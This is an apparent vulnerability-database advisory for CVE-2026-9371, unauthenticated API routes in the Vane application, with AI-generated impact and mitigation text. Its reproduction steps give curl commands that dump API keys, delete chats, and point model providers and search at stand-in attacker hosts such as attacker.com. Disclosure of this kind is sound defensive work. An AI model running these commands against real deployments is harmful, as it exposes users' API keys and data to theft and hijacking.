VYPR
Unrated severity · NVD Advisory · Published May 24, 2026

ItzCrazyKns Vane API route.ts missing authentication

CVE-2026-9371

Description

A security vulnerability has been detected in ItzCrazyKns Vane up to 1.12.1. Affected by this issue is some unknown functionality of the file route.ts of the component API. The manipulation leads to missing authentication. The attack may be initiated remotely. The attack's complexity is rated as high. The exploitation is known to be difficult. The exploit has been disclosed publicly and may be used. It appears that basic authentication is planned.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vane up to 1.12.1 has no authentication on any API endpoint, allowing unauthenticated remote attackers to read config, access API keys, modify data, and upload files.

Vulnerability

CVE-2026-9371 affects Vane versions up to and including 1.12.1 [1]. The vulnerability exists in all Next.js API route handlers located in src/app/api/*/route.ts. Every endpoint processes requests without any authentication or authorization checks. There is no authentication middleware, no session validation, no API key verification, and no user model in the SQLite database. The entire application configuration, chat history, provider settings, and file upload functionality are exposed without access control [1][2].

Exploitation

An unauthenticated remote attacker can exploit this vulnerability by sending HTTP requests to any exposed API endpoint, such as GET /api/config [2]. The attack requires no authentication, no user interaction, and no special privileges. The attacker simply makes requests to the Vane service (default port 3001) and can access or manipulate any API function [1][2].

Impact

Successful exploitation allows an attacker to read and modify the application configuration, including third-party API keys for providers like OpenAI, Anthropic, and Google Gemini [2]. The attacker can also read and delete chat history, upload arbitrary files, create, modify, and delete LLM model providers, consume LLM API quotas, hijack active sessions, and redirect search infrastructure [1]. This constitutes a complete compromise of the application's confidentiality, integrity, and availability [1].

Mitigation

As of the latest references, no patch has been released for this vulnerability [1][2]. The issue is publicly disclosed and tracked on GitHub [1]. The developer has indicated that basic authentication is planned, but no timeline for a fix is provided [1]. Users should restrict network access to the Vane service using a firewall or reverse proxy with authentication until an official update is available.

AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 1

Patches: 0 (no patches discovered yet)

Vulnerability mechanics

Root cause

"Complete architectural omission of authentication and authorization — no middleware, no per-route auth guards, and no user model in the application."

Attack vector

An unauthenticated remote attacker can reach any API endpoint on the Vane service port (default 3001) without any authentication, session validation, or API key checks [ref_id=1]. The attacker first enumerates the full configuration and all LLM provider API keys via `GET /api/config` [ref_id=2]. With those keys, the attacker can then read and delete all chat history (`GET/DELETE /api/chats/[id]`), create malicious model providers pointing to attacker-controlled infrastructure (`POST /api/providers`), redirect the search backend to an attacker server (`POST /api/config`), hijack active streaming sessions via `POST /api/reconnect/[id]`, and consume LLM API quotas by initiating chat sessions [ref_id=1].

Affected code

All 16+ Next.js API route handlers in `src/app/api/*/route.ts` lack any authentication or authorization checks. The configuration endpoint (`src/app/api/config/route.ts`) returns the full configuration object, including plaintext API keys, via `configManager.getCurrentConfig()` without filtering. No `middleware.ts` file exists in the project, confirming a complete architectural omission of access control [ref_id=1][ref_id=2].

What the fix does

No patch has been published by the vendor as of the advisory date [ref_id=1]. The advisory recommends implementing Next.js middleware authentication (e.g., a `src/middleware.ts` file that validates a Bearer token on all `/api/:path*` routes), adding user authentication with session management (e.g., NextAuth.js), and deploying network-level controls such as binding to `127.0.0.1` only or placing the service behind a reverse proxy with HTTP Basic Auth [ref_id=1]. The root cause is a complete absence of authentication logic in every route handler and no user model in the SQLite schema [ref_id=1].

Preconditions

  • network: Attacker must have network access to the Vane service port (default 3001)
  • auth: No authentication credentials or session tokens are required

Reproduction

1. Enumerate all chat history without authentication: `curl -s http://localhost:3001/api/chats | python3 -m json.tool` [ref_id=1].
2. Read the full configuration including plaintext API keys: `GET /api/config` [ref_id=2].
3. Create a malicious model provider pointing to attacker infrastructure: `curl -s -X POST http://localhost:3001/api/providers -H "Content-Type: application/json" -d '{"type":"ollama","name":"attacker-proxy","config":{"baseURL":"http://attacker.com:11434"}}'` [ref_id=1].
4. Redirect the search backend to an attacker-controlled server: `curl -s -X POST http://localhost:3001/api/config -H "Content-Type: application/json" -d '{"key":"search.searxngURL","value":"http://attacker-controlled.com:8080"}'` [ref_id=1].
5. Delete a specific chat and its messages: `curl -s -X DELETE "http://localhost:3001/api/chats/{id}"` [ref_id=1].

Generated on May 24, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References: 6

News mentions: 0 (no linked articles in our index yet)